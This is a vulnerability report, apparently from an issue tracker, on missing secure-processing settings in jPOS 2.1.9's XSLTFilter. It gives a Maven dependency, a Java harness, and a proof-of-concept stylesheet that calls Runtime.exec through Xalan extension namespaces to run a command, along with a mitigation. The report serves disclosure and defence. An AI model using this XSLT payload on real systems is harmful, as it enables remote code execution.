Open
Description
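The class org.jpos.iso.filter.XSLTFilter (XSLTFilter.java) performs XSL transformations without enabling the XSLT processor's secure-processing settings. As a result, a stylesheet can invoke Java extension functions, which poses a risk of Remote Code Execution (RCE) whenever the stylesheet passed to the filter can be supplied or modified by an untrusted party. It is recommended to enable secure processing before the stylesheet is compiled, for example by calling `setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` on the `TransformerFactory`.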
maven
<!-- https://mvnrepository.com/artifact/org.jpos/jpos -->
<!-- Version the report was reproduced against. The page does not say which
     other releases are affected or which release, if any, contains a fix. -->
<dependency>
<groupId>org.jpos</groupId>
<artifactId>jpos</artifactId>
<version>2.1.9</version>
</dependency>
POC.java
import org.jpos.iso.ISOChannel;
import org.jpos.iso.ISOException;
import org.jpos.iso.ISOMsg;
import org.jpos.iso.filter.XSLTFilter;
import org.jpos.util.LogEvent;
/**
 * Reproduction harness from the report: runs a single {@link XSLTFilter}
 * pass using the stylesheet file {@code poc.xsl}.
 *
 * <p>{@code CustomISOChannel} is not defined on this page; the harness only
 * needs some {@link ISOChannel} instance to pass to {@code filter}.
 *
 * <p>The message handed to the filter has no fields set, so everything the
 * transformation does is driven by the stylesheet. The exposure shown here
 * therefore depends on who can supply or modify the stylesheet file given to
 * the filter, not on the content of the ISO message.
 */
public class jposTest {
    /**
     * Builds the filter's three arguments, then constructs the filter and
     * applies it once.
     *
     * @param args unused
     * @throws ISOException declared because the jPOS calls below may throw it
     */
    public static void main(String[] args) throws ISOException {
        final ISOChannel stubChannel = new CustomISOChannel();
        final ISOMsg emptyMessage = new ISOMsg();
        final LogEvent logEvent = new LogEvent();

        // The stylesheet path is the only input that matters for this report.
        // Hardening belongs inside XSLTFilter, where the XSLT processor is
        // set up, rather than in callers such as this one.
        new XSLTFilter("poc.xsl", true).filter(stubChannel, emptyMessage, logEvent);
    }
}
poc.xsl
<!--
  Stylesheet from the report, kept unchanged.

  The prefixes rt and ob are bound to namespaces of the form
  http://xml.apache.org/xalan/java/<class name>. That is the Xalan style
  Java extension namespace, which lets XPath expressions call methods of the
  named Java class. Whether these calls resolve depends on the XSLT processor
  on the classpath and on its configuration.

  Mitigation: when XMLConstants.FEATURE_SECURE_PROCESSING is enabled on the
  TransformerFactory, extension functions like these are expected to be
  rejected when the stylesheet is compiled or run. Confirm this against the
  processor version actually deployed.

  Review signal: a stylesheet that declares a namespace under
  http://xml.apache.org/xalan/java is worth flagging wherever stylesheets are
  loaded from locations that are writable by anyone other than the operator.
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<!-- Obtains the java.lang.Runtime instance through the extension namespace. -->
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<!-- Starts an external process. The command in the report only opens the
     macOS Calculator, as a visible marker that the call was executed. -->
<xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
<!-- Converts the returned object to a string and writes it to the output. -->
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>